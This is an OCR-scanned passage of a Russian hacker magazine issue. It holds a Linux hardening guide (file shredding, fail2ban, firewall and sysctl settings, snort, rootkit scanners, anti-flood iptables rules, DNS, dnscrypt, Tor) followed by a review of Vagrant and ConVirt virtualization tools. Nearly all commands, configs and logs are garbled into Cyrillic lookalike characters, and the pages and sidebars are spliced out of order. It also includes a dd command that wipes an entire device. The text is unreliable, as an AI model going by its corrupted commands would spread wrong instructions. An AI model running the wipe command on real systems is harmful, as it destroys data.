тоже, что теперь? А теперь мы должны позабо- 
титься о том, чтобы какие-то куски наших лич- 
ных данных не попали в чужие руки. Ни для кого 
не секрет, что при удалении файла его актуаль- 
ное содержимое остается на носителе даже 
в том случае, если после этого произвести 
форматирование. Наши зашифрованные дан- 
ные будут в сохранности даже после стирания, 
но как быть с флешками и прочими картами па- 
мяти? Здесь нам пригодится утилита $пт, кото- 
рая не просто удаляет файл, а еще заполняет 
оставшиеся после него блоки данных мусором: 


$ зидо арЕ-веф 1п$%а11 зесиге-де1ефе 
$ °гт секретный-файл.ЕхЕ КНоте-\м1аео.тря 


ТМЕО; СРеск1пд 91$К зрасе, 111$ мтац ТаКе а Теш тотепфт5. Р]еазе Бе ра{т1епф. 
[МЕО:  Среск1пд Тог ореп 111ез 1п /Поте/уазуа 


ХХХ ххххххххххххххххххххххххххххххххххххххххххххх 


УОУ 5НОЦЕО РЕСОЮО УОУЮ МОУМТ РЯЗ$ЗРНЮА$Е ЯМО 5ТОРЕ ТТ ТН Я $5НАЕЕ Г ОСЯТТОН, 
есгур*15-ипигар-раззрРгазе “/.есгур{$/шгарред-раззрЬгазе 
ТН15 НЕ ВЕ РКЕЧУТРЕО ТЕ У0Ц МЕЕО ТО ЮЕСОУЕР УО(УВ БАТАЯ АТ Я ТЯТЕЮ ТТМЕ, 


ХХХ хххххххххххххххххххххххх 


ТМЕО: Епсгурфед9 Роме Ваз Бееп зеф ир, епсгур{1пд 111е$ пош...171$ тау ТаКе а шп!1е, 


1. ТРе Те епсгур\1оп арреагз Фо Пауе сотр1ефеЧ зиссез$Ти11у, Пошеуег, 
азпер МУЗТ ЕОБТМ ТММЕОТАТЕЕУ, _ВЕРОРЕ_ТНЕ_МЕХТ_ВЕВООТ_, 


2. {1 азпер сап 109 1п апЯ геа апЯ9 шг1Тте Т1Ве1г 111е5, {Реп 1Пе т1дга{1оп 1$ сотр1ефе, 
ап@ цоч зПоу149 гетоуе /Боте/уазца.81\Е96М. 
О+Регш15е, гезфоге /Боте/уазчца.81\Е БМ Баск фо /Боте/уазчца., 


Как всегда, все просто до безобразия. Далее, 
если речь идет о всем носителе, можно восполь- 
зоваться старым добрым аа: 


# аа 1+=/аеу/хего о+=/аеху/$ъаь 


Эта команда сотрет все данные на флешке $9. 
Останется создать таблицу разделов (с одним раз- 
делом) и отформатировать в нужную ФС. Исполь- 
зовать для этого рекомендуется 19$К и тКЕ5. Маф, 
но можно обойтись и графическим арапеч. 


УГРОЗА ИЗВНЕ 

Теперь позаботимся об угрозах, исходящих 
из недр всемирной паутины. Здесь я должен 
был бы начать рассказ об рмаШез$ и р+, запу- 
щенном на выделенной машине под управле- 


ПРЕДОТВРАЩЕНИЕ 
ВВОТЕГОВСЕ-АТАК 


РаИ2Бап (м/м/м.Тай26ап.ога) — демон, 
который просматривает логи на пред- 
мет попыток подобрать пароли к се- 
тевым сервисам. Если такие попытки 
найдены, то подозрительный 1Р-адрес 
блокируется средствами прфафе$ или 
ТСР \Маррег$. Сервис способен опо- 
вещать владельца хоста об инциденте 
по етай и сбрасывать блокировку через 
заданное время. Изначально ГаЙ2бап 
разрабатывался для защиты $5$Н, се- 
годня предлагаются готовые примеры 
для Араспе, Поп{ра, Роз Их, ехит, Суги$ 
|МАР, патеа и так далее. Причем один 
процесс Еай2Бап может защищать сразу 
несколько сервисов. 

В Убити/Оефапт для установки на- 
бираем: 


# аре-сеф 1п${а1] +а112Бап 


Конфиги находятся в каталоге /ефс/ 
фа1126ап. После изменения конфигу- 
рации следует перезапускать Тай2Бап 
командой: 


# /еЕс/1п1*.а4/Ра1126ап гезфаг* 


125 Отхога 


нием ОрепВ5$О, но все это излишне, когда есть 
ркиподти. Что это такое? Это скрипт, который про- 
изведет за нас всю грязную работу по конфигу- 
рированию брандмауэра, без необходимости 
составлять километровые списки правил. Уста- 
навливаем: 


$ зидо арЕ-веф 1п$%а11 1рКипёРи 


Правим конфиг: 


$ зиао м1 /еЕс/1ркипяРи/1рКипеРи . соп 


# Локальная сеть, если есть — пишем 
# адрес сети вместе с маской, нет — 
# пишем 1оорбасК-адрес 

[ОСА _МЕТ="127.0.0.1" 

# Наша машина не является шлюзом 
САТЕМАУ=0 

# Закрываем нужные порты 

РОКВТООЕМ _РОВТ$="135 137 139" 

# Блокируем пинги, 90% киддисов 

# отвалится на этом этапе 

ВЕОСК _РТМ№@5=1 

# Дропаем подозрительные пакеты 

# (разного рода флуд) 
5У5$РЕСТ="ОКОР" 

# Дропаем «неправильные» пакеты 

# (некоторые типы 005) 

КМОММ _ВАБ="ОКОР" 

# Сканирование портов? В трэш! 
РОВТ_$САМ="ОКОР" 


Для включения 1ркКипоТи открываем файл /ес/ 
аетаи\Лркипоти и меняем строку 1РКЕЗТАНТ = 0 
на 1РКЕЗТАНТ = 1. Запускаем: 


$ зидо 1рКипёФи 


Дополнительно внесем правки в /64{с/5узсЯ.соп?: 


$ зиао м1 /еёс/зу$Ес1. соп+ 

# Дропаем ТСМР-редиректы (против атак 
# типа МТТМ) 
пе*.1р\4.соп+.а11.ассер*_гед1гес®$=0@ 
пе*.1р\уб.соп+.а11.ассер*_гед1гес$=0 
# Включаем механизм ТСР зупсоокК1е$ 
пе*.1ру4.Еср_зупсоокК1е$=1 

# Различные твики (защита от спуфинга, 
# увеличение очереди «полуоткрытых» 

# ТСР-соединений и так далее) 
пе*.1ру4.Еср_Е1тезатр$=0 
пе*.1ру4.сопф.а11.гр_Я1%ег=1 
пеф.1ру\у4.Еср_тах_5уп_Баск105=1280 
Кегпе]1.соге_изе$_р14=1 


Активируем изменения: 


$ зидо зу$зс1 -р 


ВЫЯВЛЯЕМ ВТОРЖЕНИЯ 

пой — одинизлюбимейших инструментов адми- 
нов и главный фигурант всех руководств по без- 
опасности. Штука с долгой историей и колоссаль- 
ными возможностями, которой посвящены целые 
книги. Что он делает в нашем гайде по быстрой 
настройке безопасной системы? А здесь ему са- 
мое место, Зпой можно и не конфигурировать: 


$ зидо арЕ-веф 1п$%а11 пог 
$ эпогЕ -0 


Все! Я не шучу, стандартных настроек Зпой 
более чем достаточно для защиты типовых се- 
тевых сервисов, если, конечно, они у тебя есть. 
Нужно только время от времени просматривать 
лог. Авнем можно обнаружить строки типа этих: 


[**] [1:2329:6] М5-50Ё ргобе гезропзе += 
оуегНом аЕетре [**] 

[С1а$$1Аса1оп: А&етрфеа Цзег ‹= 
Рг1\11ере ба1п] [Рг1ог1\у: 1 

[Хге+ => [ичг1 ] Ир: / /ммм. зесиг1УФоси$ . «= 
сот/61а/9407] [/иг1] 


Упс. Кто-то пытался вызвать переполнение бу- 
фера в МУЗОСЕ. Тут сразу есть и ссылочка на стра- 
ницу с детальным описанием проблемы. Красота. 


КТО-ТО НАСЛЕДИЛ... 

Кто-то особенно умный смог обойти наш бранд- 
мауэр, пройти мимо $пой, получить права гос 
в системе и теперь ходит в систему регулярно, ис- 
пользуя установленный бэкдор. Нехорошо, бэкдор 
надо найти, удалить, а систему обновить. Для по- 
иска руткитов и бэкдоров используем гкпищег: 


$ зидо арЕ-веф 1п5%а11 гкпипег 


Запускаем: 


$ зиао гкпипег -с --$К 


Софтина проверит всю систему на нали- 
чие руткитов и выведет на экран результаты. 
Если зловред все-таки найдется, гкпитег ука- 
жет на место и его можно будет затереть. Более 
детальный лог располагается здесь: /маг/Лод/ 
кпитег.!о9. Запускать гкпищег лучше в качестве 
сгоп-задания ежедневно: 


ПАРОЛЬ НА ЗАГРУЗЧИК 


Для установки пароля на СВЫВ необходи- 

мо выполнить два действия: 

1. Посредством запуска /$61п/вгиЬ 
вызвать интерактивную оболочку за- 
грузчика, набрать команду та5сгур\ 
и ввести желаемый пароль. После 
этого программа выведет на экран 
его МО5-хеш. 

2. Добавить в конфиг /Боо*/эгиб/эгиЬ. 
СОП+ ОПЦИЮ «раз$мога --та5 хеш- 
пароля». 


$ зи4о м1 /ефс/сгоп.4а11у/гКИипт*ег. $1 
#1! /61п/Ба$в 

/ч5г/61п/гкпиптег -с --сгоп]об 2>81 «= 
| ма11 -$ "ВКпипЕег $сап Вези1%$" + 
уазуа@ета11 . сот 


Заменяем етай-адрес Васи на свой и делаем 
скрипт исполняемым: 


$ зиао сптоЧ +х /ефс/сгоп.да11у/+- 
гкпипег . $И 


Базу гкпижег рекомендуется время от време- 
ни обновлять с помощью такой команды: 


$ зиао гквипеег --ирдае 


Ее, кстати, можно добавить перед командой 
проверки в сгоп-сценарий. Еще два инструмента 
поиска руткитов: 


$ зидо арЕ-вее 1п5%а11 +1вег 
$ зиао Е1вег 


$ зи4ао аре-веф 1п$%а11 1уп15 
$ зидо 1уп1$ -с 


По сути, те же яйца Фаберже с высоты птичье- 
го полета, но базы у них различные. Возможно, 
с их помощью удастся выявить то, что пропустил 
критег. Ну и на закуску аебзит$ — инструмент 
для сверки контрольных сумм файлов, установ- 
ленных пакетов с эталоном. Ставим: 


$ зидо ар-веф 1п$%а11 дебзит$ 


Запускаем проверку: 


Спеск1п9 Тог гоо{К1+1$... 


55В8В Тго]ап - \Маг1апе Я 
АСМ Ногт 

А]ак1+ Юоо+К1+ 

АЧоге Воо+К1+ 

аРа К1Т 

АрасАе Ногт 

АтЬ1епе Тагк) Роофк1+ 
Ва]аиг Воо{К1+ 

Веаё КАТ ВоофЕТ 

Бех2 Воо+К1+ 

ВОВК1+ ВоотЕ1+ 

СЬ Воо+Е1+ 

СНК Ногт (51аррег.В уаг1ап*) 
баппу-Воу"= ЯБузе К1+ 
бе] РВоофК1+ 
О1са-К1+ Роо+К1{ 
Огеатз Воск 
биуагвыкг ВоотКк1+ 

Епуе (КМ 

Е1]еа 1пиых Воо{к1+ 

Ры ВоотЕ1+ 


РегТогт1пд спеск оР Кпошп гоо+К1+ 111ез апд О1гесфог1ев 


5у$Тет спеск$ эиттагу 


Моф Тоуп9 
Но Тоупа 
Мо Тоип9 
Мо Тоип9 
Нот Тоуп9 
Но Тоуп9 
Моф Тоип9 
Мот Тоупо 
Моф Тоупд 
Мо Тоипд 
Томгиз 
Моё Тоипд 
Мое Тоуп9 
МоЕ Тоцпа 
Но Тоип9 
Мое Тоупд 
Нат Тоуп9 
Но Тоуп9 
Ноф Тоип9 
Моф Тоуп9 
Моф Тоип9 


бизрес{ 111ез: 1 


РоотК1Т срРеск$.., 


РН Е РЕ р п р р Е Е р р р р ЕН р р 2 р р г 2 
= 
[= 
= 

К бий ый Кий Кош бий ый бы бий фышй Кошй бий Кошй болый фишй Бай бай фошй Ьашй Кашй  фоший 


>В 


Е11е ргорегт1ез сбеск$... 
Реди1геЧ соттапд$ сПеск Та11е9 
Е11ез срескеч;: 121 


РоотК11$ срескеч ! 
Ро$$161е гоотК11$: 


396 


Арр11саф1опз спеск$... 
Ярр11са{1опз срескеяд: 3 
бизресф арр11са{1оп$: Й 
ТРе зузфет спеск$ Тоок: 2 т!пу{фез апЯ 58 зесопЧ$ 


Я1] гези1+$ Пауе Бееп шг1\+Теп То 1Ве 109 Т111]е (/уаг/1о9/гКкРиуптег , 109) 


Опе ог тоге шагп1п9$ Вауе Бееп ТоупЯ9 шб11е сВеск1пд Т1Пе эуз{ет. 
Р1еазе свеск Т1Пе 104 111е (/уаг/1од/гкрвипТег. 1049) 


Вкпижегза работой 


В моей системе руткитов нет 


ХАКЕР 09 /176/ 2013 


Параноид линуксоид 


+ @ ом 


'Тог 15 поЕ ап НТТР Ргоху 


К арреаг; уси Вауе сопЙригей уог \уеб Бгомгзег о ие Гог а5 ап НТТР ргоху. 15 15 пог согтесе: Тог 15 
а 5ОСК$ ргоху, пог ап НТТР ргоху. Р!сазе сопЙшге уошг сне ассог@ ту. 


Зее №5: Логргодесцог/Чосшиещацон. ши ог шоге иоппаЧоп. 


ФОФРЦх > шее 
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БОРЬБА С ФЛУДОМ 


Приведу несколько команд, которые могут помочь при флуде твоего 
хоста. Подсчет количества коннектов на определенный порт: 


$ пефзфаф -па | вгер ":порт\_" | мс -1 


$ сидо аебзит$ -ас 


Как всегда, запуск можно добавить в задания 
планировщика сгоп. 


ЗАПРЕДЕЛАМИ 

Теперь поговорим о том, как сохранить свою 
анонимность в Сети и получить доступ к сайтам 
и страницам, заблокированным по требова- 
нию различных организаций-правообладателей 
и прочих Мизулиных. Самый простой способ сде- 
лать это — воспользоваться одним из тысяч прок- 
си-серверов по всему миру. Многие из них бес- 
платны, но зачастую обрезают канал до скорости 
древнего аналогового модема. 

Чтобы спокойно ходить по сайтам и только 
в случае необходимости включать прокси, можно 
воспользоваться одним из множества расшире- 
ний для Спготе и Еге?ох, которые легко находятся 
в каталоге по запросу ргоху змщспПег. Устанавлива- 
ем, вбиваем список нужных прокси и переключа- 
емся на нужный, увидев вместо страницы таблич- 
ку «Доступ к странице ограничен по требованию 
господина Скумбриевича». 

В тех ситуациях, когда под фильтр попал 
весь сайт и его адрес внесли в черный список 
на стороне ОМ$-серверов провайдеров, можно 
воспользоваться свободными ОМ№$5-серверами, 
адреса которых опубликованы здесь: 90о.4/ 
Е ий \1. Просто берем два любых понравившихся 
адреса и добавляем в /&с/тезоМ№.сопЁ: 


патезегуег 156.154.70.22 
патезегуег 156.154.71.22 


Чтобы разного рода ОНСР-клиенты 
и МемогкКМападегы не перезаписали файл адре- 
сами, полученными от провайдера или роутера, 
делаем файл неперезаписываемым с помощью 
расширенных атрибутов: 


$ зсиао сПпаЕг +1 /еёс/гезо]1м. соп+ 


После этого файл станет защищен от записи 
для всех, включая го01. 

Чтобы еще более анонимизировать свое пре- 
бывание в Сети, можно воспользоваться также 
демоном апзсгурт, который будет шифровать все 
запросы к ОМ№$-серверу в дополнение к прокси- 
серверу, используемому для соединения с самим 
сайтом. Устанавливаем: 


$ мвеЕ НЕЁр: / /домп1оаа.апзсгур* .оге/+= 
ап5зсгур*-ргоху/Чапзсгур*-ргоху-1.3.2.- 
фаг. 672 
Бип71р2 -сЧ ап$сг 
672 | фаг хм - 

$ са апзсгур*-ргоху-* 

$ зидо арЕ-веф 1п5%а11 Би11а-ез5еп1а1 

$ ./сопйвиге && таке -)2 

$ зиао таКе 1п5%а11 


-ргоху-*.Фаг.+ + 


Указываем в /ефс/гезо1\у.сопР 1оорбаск- 
адрес: 


$ м1 /ефс/ге$о]1м. соп+ 
патезегуег 127.0.0.1 


Подсчет числа «полуоткрытых» ТСР-соединений: 


Тогговорит, что он 
не НТТР-прокси 


$ пефзфаф -па | вгер ":порт\_" | вгер $УМ_ВС\УО | мс -1 


Просмотр списка |Р-адресов, с которых идут запросы на подключе- 


ние: 


$ пефзфаф -па | вгер 


ор и Овь +] и е Ш 


$0Гф -пг | 1е$$ 


Анализ подозрительных пакетов с помощью {сраитр: 


# Есраитр -п -1 ееНВ@ -$ 9 -м оцфриф.ЕхЕ @а$Е рогЕ «= 


порт апа Поз ТР-сервера 


ПМЕО 


Дропаем подключения атакующего: 


Версия Тог для Апаго!а 
называется Ого. 


# 1рфаб1ез -А ТМРИТ -5 ТР-атакующего -р ср «= 


- -ае${1па*1оп-рогЕ порт -) ОВОР 


Чтобы введенный 
в командной строке 
пароль не был сохранен 
в истории, можно ис- 
пользовать хитрый трюк 


Ограничиваем максимальное число «полуоткрытых» соединений с 
одного |Р к конкретному порту: 


# 1рфаб1ез -Т ТМРИТ -р ср --зуп --арогЕ порт -т <= 


под названием «добавь 


1р1111 --1р1111&-абоуе 10 -] ОКОР 


В начале команды про- 


бел». Отключаем ответы на запросы |1СМР ЕСНО: 


Именно есгурИ$ исполь- 


# 1рфаб1ез -А ТМРИТ -р 1стр -) ОВОР --1стр-%уре 8 


зуется для шифрования 
домашнего каталога 
в Обипци. 


Запускаем демон: 


$ зидо апзсгур*-ргоху --Чаетоп1те 


Кстати, версии апзсгурт есть для МИпаом/$, 0$ 
и Апагога. 


ЛУКОВАЯ МАРШРУТИЗАЦИЯ 
Что такое луковая маршрутизация? Это Тог. 
А Тог, в свою очередь, — это система, кото- 


рая позволяет создать полностью анонимную 
сеть с выходом в интернет. Термин «луковый» 
здесь применен относительно модели работы, 
при которой любой сетевой пакет будет «обер- 
нут» в три слоя шифрования и пройдет на пути 
к адресату через три ноды, каждая из которых 
будет снимать свой слой и передавать резуль- 
тат дальше. Все, конечно, сложнее, но для нас 
важно только то, что это один из немногих типов 
организации сети, который позволяет сохранить 
полную анонимность. 

Тем не менее, где есть анонимность, там 
есть и проблемы соединения. Иу Тог их как ми- 
нимум три: он чудовищно медленный (спасибо 
шифрованию и передаче через цепочку нод), 
он будет создавать нагрузку на твою сеть (пото- 
му что ты сам будешь одной из нод), и он уязвим 


для перехвата трафика. Последнее — естествен- 
ное следствие возможности выхода в интернет 
из Тог-сети: последняя нода (выходная) будет 
снимать последний слой шифрования и может 
получить доступ к данным. 

Тем не менее Тог очень легко установить и ис- 
пользовать: 


$ зидо арЕ-веф 1п5%а11 ог 


Все, теперь на локальной машине будет 
прокси-сервер, ведущий в сеть Тог. Адрес: 
127.0.0.1:9050, вбить в браузер можно с помо- 
щью все того же расширения, ну или добавить 
через настройки. Имей в виду, что это ЗОСК$, 
ане НТТР-прокси. 


ВЫВОДЫ 

Вот и все. Не вдаваясь в детали и без необходи- 
мости изучения мануалов мы создали Мпих-Бох, 
который защищен от вторжения извне, от рут- 
китов и прочей заразы, от непосредственно 
вмешательства человека, от перехвата трафика 
и слежки. Остается лишь регулярно обновлять 
систему, запретить парольный вход по ЗЗН, 
убрать лишние сервисы и не допускать ошибок 
конфигурирования. = 


Тог уязвим для перехвата трафика — последняя 
нода (выходная) будет снимать последний слой 
шифрования и может получить доступ к данным 


Зо $УМ/АСК 


ВИРТУАЛ 
КОМАНД 


т 


в 


ОБЗОР ПОЛЕЗНОГО СОФТА ДЛЯ 
УПРАВЛЕНИЯ ВИРТУАЛИЗАЦИЕИ 


Сегодня многие задачи, для которых традиционно от- 
водилось несколько физических серверов, переносят- 


ся в виртуальные среды. Технологии виртуализации 


востребованы и разработчиками софта, поскольку по- 
зволяют всесторонне тестировать приложения в раз- 


личных ОС. Вместе с тем, упрощая многие вопросы, 


системы виртуализации сами нуждаются в управле- 


нии, и без специальных решений здесь не обойтись. 


УАСВАМТ 
Виртуальная машина \/тиа!Вох заслуженно пользуется по- 
пулярностью среди админов и разработчиков, позволяя бы- 
стро создавать нужные окружения при помощи графического 
интерфейса либо интерфейса командной строки. Если коли- 
чество \М не превышает трех, никаких трудностей в развер- 
тывании и управлении не возникает, но современные проекты 
имеют свойство обрастать конфигурациями, и в итоге полу- 
чается весьма сложная инфраструктура, справиться с кото- 
рой становится непросто. Вот эту проблему и призван решить 
менеджер виртуальных окружений \адгап{ ( | 
позволяющий создавать копии виртуальных машин с зара- 
нее определенной конфигурацией и динамически перерас- 
пределять ресурсы \М (Ргомзюпта) по мере необходимости. 
В базовой поставке \адгап{ работает с УмиаВох, но систе- 
ма плагинов позволяет подключить другую систему вирту- 
ализации. На сегодня открыт код плагинов для АМ ( 
)} и Васкзрасе Сюча ( 

), по коммерческой подписке до- 

ступен плагин для поддержки /М\маге ГизопМ№Могк$айоп. 


" к 


У 


Сергей Яремчук 
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\Уадгат{ не создает виртуальную машину с нуля. Для удоб- 
ства проект предлагает несколько базовых образов (Бохез), 
которые импортируются и впоследствии используются для бы- 
строго развертывания системы, уже на основе бохе$ собирает- 
ся гостевая ОС с нужной конфигурацией. 

Для упрощения развертывания приложений в бохе$ пред- 
устанавливаются СПЕ и Риррет. Кроме того, нужные установки 
можно задавать при помощи $Пе!. В состав окружений включа- 
ется полный комплект для запуска и разработки приложений 
на Вибу. Для доступа к \М используется ЭЗН, возможен обмен 
файлами через расшаренную директорию. 

Написан \Мадгат с использованием Вибу, установить его 
можно на любую платформу, для которой есть компоненты 
\МциаВох и Виру. На странице загрузки ( 

) доступны пакеты для \\МИпао\ми/з, Мпих (аеб игрт) и ОЗХ. 

Процесс установки и использования в ЧУбити прост. Скачи- 
ваем пакеты /У[иа!Вох и Мадгат и ставим: 


$ зидо аАрКв -1 \1гфиа16ох-4.2.109_ата64.4еь 
$ зидо арКё -1 уаргап*_1.2.2_х86_64.аеб 


На момент написания статьи с последней актуальной верси- 
ей УтиаВох 4.2.14 были проблемы при запуске \Мадгат, поэто- 
му пока лучше использовать 4.2.12 или тестовую 4.2.15. Как ва- 
риант, можно выполнить: 


$ са -/ .мавгап{*.а/Бохе$/ВохМате/\1г%иа16ох 
$ ореп$$51 °Па1 *.утак *.о\мф > Бох.ме _ 

Приведу альтернативный способ установки \адгай{ — с ис- 
пользованием Вирбу: 


$ зидо ар*-вее 1п$5фа11 гибу1.8 гиБу1.8-аеу «= 
гибузет$1.8 _ | — 
$ зидо вет 1п$%а11 уавгапе 


Все настройки проекта производятся в специальном файле 
\адгап!е ( ). Чтобы не соз- 
давать шаблон вручную, его можно сгенерировать следующим 
образом: 
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$ мка1г ргодес* 
$ са ргодес* 
$ уавгапЕ 1п1 


$ \МВохМапаге 1трогЕ /поте/изег/.уаёгап* ./Бохе$ /‹= 
ргес15е64 /м1гЕца1Бох/Бох .о\м+ 
\/1гЕца1 зузфет 0: 


Теперь можно заглянуть в созданный файл настроек и за- 
полнить: установки \М (сопНа мт.^”), опции подключения по 5ЗН 
(сопНа.$$П.*), параметры самого \Мадгапт{т (сопНа.мадгапт). Все 
они хорошо документированы, значение некоторых понятно 
и без пояснений. 

На самом деле при запуске используется несколько таких 
файлов, каждый последующий переопределяет предыдущий: 
встроенный в \адгат (его изменить нельзя), поставляемый 
с бохе$ (упаковывается при помощи ключа `--уадгап ее”), рас- 
положенный в =/.мадгатт.а и файл проекта. Такой подход по- 
зволяет использовать установки по умолчанию, переопределяя 
в конкретном проекте только то, что необходимо. 

Все установки производятся при помощи команды уадгаи\, 
список доступных ключей можно просмотреть при помощи '-П". 
После установки мы не имеем ни одного образа, запуск уавгап* 
Бох 115+ выведет пустой список. Готовый бох может находиться 
в локальной ФС или на удаленном сервере, в качестве параме- 
тра задается его имя, по которому будем обращаться в проек- 
тах. Например, используем официальный Вох Убит 12.04 (Т5, 
предлагаемый разработчиками \аодгаи1. 


$ уавгапе Бох ад ргес1$е64 «= 
ПЕЕр: //А1е$ .уавгап фир. сот/ргес15$е64.Бох 


Теперь к нему можно обращаться из \Мадгам!е: 


сопйй.\т.Бох = "ргес15е64" 


Хотя проще сразу его указать при инициализации проекта: 


$ уавгапЕ 1п1% ргес15е64 


9: 5иввезфед 05$ фуре: "УБипти_64" 
(свапёе м1ЕИ "--мзу$ @ --озфуре <«фуре>"; иже 
"11$5& озфурез" Фо 115% а11 ро$$161е уа1ие$) 
1: зиввезфеа \М пате "ргес15е64" 
(свапге м1ЕИ "--мзу$ @ --утпате ‹пате>") 
2: Митбег оф СРУ$: 2 
(свапёе м1ЕИ "--мзу$ @ --сри$ ‹п>") 
3: биез& метогу: 384 МВ 
спапёе м1ЕИ "--у5у$ @ --тетог 


<МВ>" 


Не всегда они удовлетворяют заданным условиям, но, ис- 
пользуя настройки провайдера, можно легко изменить установ- 
ки конкретной \М (см. подсказки «спапде м ...»): 


сопйв.\т.ргоу14ег :\1геиа16ох ао |\м6| 
м6. сизфот17е ["тоа1Руут", :14, «= 
"--тетогу", "1024" ] 


епа 


Запускаем и подключаемся к системе по $$Н: 


$ уавгаптЕ ичр 
$ уавгапе $$П 


Чтобы остановить \/М, используется параметр Пай или 
аез$гоу (второй — с очисткой всех файлов, в следующий раз все 
операции будут выполнены с начала), если нужно отправить ее 
в спячку — уаёгап® зизрепа, вернуть — уаёгап{ гезите. 

Для примера работы с СПЕ! можно использовать готовый 
рецепт, при помощи которого настроить АРТ и Араспе2?: 


сопЯв.\т.ргом1$1оп :спе+_$01о ао |спе+| 


Самый простой способ, не требующий изучения СВЕ 
и Рирре, — это использовать для конфигурирования \/М стан- 
дартные команды оболочки, которые можно прописать прямо 
в \\адгат Е или, что еще лучше, объединить в скрипт, который 
подключается так: 


\Маёгапе . сопйриге ("2") до |сопйв | 
сопйз.ут.ргом1$1о0оп :$Не11, :1п11пе => ++ 
Мо 


епа 


Теперь все команды, указанные в $спр\.зП, будут выполнены 
при запуске \М. 

При старте проекта создается ом-файл, его установки 
можно просмотреть при помощи графического интерфейса 
\Мииа!Вох или команды \ВохМападе: 


7 6ФЕ Мех $00есв Тениный 155 неф 


Теттицеыа! № Тетипа! 
ие фас На ге! рголесЕ $ 1$ 

Уаргайт! 1 16 

мет Фимс Нлгиб1 $ са Маргап#11е 


# -*- поде; гыбу -*- 
# м1; сет ТасибБу : 


Маргаие . сот 1риге(”"2") до |соп%1Х| 
# А11 Уаргапх соп1ругохтоп 1$ Фопе Беге. ТПе тозг совтюп соп1бугат1от 
# орт1от$ аге досижептей апд соатептед Бе1ой. Рог а соаф]ете ге!тегеопсе. 
# р1еззе зее тВе оп]4пе фбосивептах1от ат уаргайтир. сом. 


# Еуегу Уазгапт у1гхиа| епузгогаепе гефийге$х э Бох $0 М1 01 о+. 
со 18.мп.БОХ = "Базе" 


Тпе иг1 Тгоя меге те ‘соп 1. у.00х’ бох и111 Бе Тетспед 11 11 
бофзп' т а1]гезбу ©ех15т об СРе изег"$ зузтеа. 
СОК, ут. Бо мг| = “ВЕКр: // боба ат ‚сов/ратм/то/аБоуе ,Бох“ 


Сгеате а Тогмаг4е9 рогх тарраёля ипасп а110м$ ассез 10 а 5рес11с рогт 
\1хРап хе азаст:те Тгом а роге оп {№ по$т васпите. 11 ме ехавр!е ве1ом, 
эссеззфтЕ “10с211051:8080* 1 ассез$ рогт 80 оп те виезх масрте, 
соп#1р.ут.петмогк :Тогиагдед рогу, риезт: 80, По5т: 8080 


Сгеате а рг1уахе петмогк, ипсв аШоиу ПОзТ-ОПЦУ дссе$$ то Ме вастте 
ии э зрес11с ПР. 
соп1х.ут.петиюгк :рг1уате_петмогк, 1р: ”192.168.33.10” 


Сгеате а рыбе петиогк, ибасв кепега!1у ватспед то га 9кед петмогк, 
Вг19реб петиогк$ таке «Ме васп1пе эррезг а5 зпотНег рпуз1са1 дем1се оп 
усуг петиогк. 

СОТА, ут. петмогк рф с петмогк 


Зпаге ап 2091110п0а1 1014ег то 1Пе риуезт УМ. ТТе 11г5х агротепт 1$ 
уПе рам оп Ве По$т то хПе асхыа! +014ег. Те $есоп9 агритете 1$ 
пе разп оп те виезт то воипу тре 1о014ег. Ала све орт1опа1 тр1гд 
эгромепт 15 а зет ой поп-гедийсед орт10й$. 


Вест ай 


спеф.гес1ре_иг1 = "Ир: //Я1е$ .уаёгапфир. сот/ «= 
зеЕ{1п8_$5фагфед/соокБоок$ .фаг.в7" 
спе+.а4а_гестре ("уавгап*_та1п") 


епа 


Чтобы обращаться к \М «извне», потребуется настроить 
проброс портов. По умолчанию производится проброс 22 -> 
2222, позволяющий подключаться по ЗЗН. 

Добавляем в \Уадгапе: 


\Маргап*: : СопЯё.гип ао |сопйЯ | 
сопйй.\ут.Когмага_роге 80, 1111 


епа 


Теперь к веб-серверу можно обратиться, перейдя по адресу 
ИЕ р://127.0.0.1:1111/. Чтобы не настраивать окружение каждый 
раз, лучше собрать на его основе готовый пакет. 
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Сайт проекта Уадгапт: 
уадгатир.сот 


Книга \/адгапт Ур апа 
Випппо: Би.1у/1 7 77 ЕВ 


Сайт Кагезап$и!: 
Кагезапзи!-рго]ест и 


Проект Соп\щ: 
сопуШиге.сот 


Сайт Меб\ Мог: 
мебм таг. пе{ 


Страница Ргохтох \Е: 
ргохтох.сот 


и 

Настройка проекта 

в Уадгап+ производится 
припомощи специаль- 
ного файла 


хх 


\Уадгап{ — удобная над- 
стройканад УпЧиаВох 


уе Е ем Зеис о ептигым Нар 

[рег есь ине =иИргоест 1 $ увегаме Бок ат 

ргес15е64 Гузгеыа1 Бок) 
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$ уавгапЕ расКаве --уавгап81е \/авгапЕЯ1е «= 
--оиЕриЕ ргодес*.Бох 


Теперь файл ргаес.бох можно распространить среди 
остальных администраторов, разработчиков или простых 
пользователей, которые подключат его при помощи команды 
\авгап{ Бох аа ргодес*.Бох. 


СОМ\МАТ 

Системы виртуализации Хеп/К\УМ, выпускаемые под свобод- 
ными лицензиями, не имеют удобного интерфейса, что часто 
трактуется не в их пользу. Однако этот недостаток легко вос- 
полнить. Соп\ (сопуиге.сот) позволяет развертывать вир- 
туальные машины на нескольких серверах Хеп и К\УМ буквально 
одной кнопкой, при помощи простого в использовании интер- 
фейса. Доступны все необходимые операции с виртуальными 
машинами: запуск, останов, создание снимков, контроль и пе- 
рераспределение ресурсов, подключение к \М по УМС, авто- 
матизация задач администрирования. Технология Аах делает 
интерфейс интерактивным и похожим на настольное приложе- 
ние. Например, \М с одного сервера на другой можно просто 
перетащить. Интерфейс нелокализован, но управление интуи- 
тивно понятное. 

Объединение серверов в пулы дает возможность настраи- 
вать и контролировать виртуальные машины и ресурсы на уров- 
не серверного пула, а не отдельного сервера. На виртуальных 
системах не устанавливаются агенты, необходим лишь пакет 
сопм[-юо!на физическом сервере. Это упрощает администри- 
рование и развертывание. 

После добавления нового сервера Соп\/Ш автоматически 
соберет данные о его конфигурации и производительности, 
предоставляя итоговую информацию на нескольких уровнях — 
от отдельной виртуальной машины, физического сервера 
до всего пула. Собранные данные используются для автомати- 
ческого размещения новых гостевых систем. Эта информация 
также выводится в виде наглядных графиков. 

Для создания виртуальных машин используются шабло- 
ны — описания настроек виртуальной машины, содержащие 
данные о выделяемых ресурсах, путь к файлам ОС и дополни- 
тельные настройки. После установки доступно несколько гото- 
вых шаблонов, но при необходимости их легко создать самому. 

Поддерживаются все технологии: балансировка нагрузки, 
горячая миграция, виртуальные диски с растущей емкостью, 
позволяющие задействовать ресурсы по мере необходи- 
мости, и многие другие возможности, реализованные в Хеп 
и К\УМ. Чтобы перераспределить ресурсы, остановка УМ 
не требуется. 

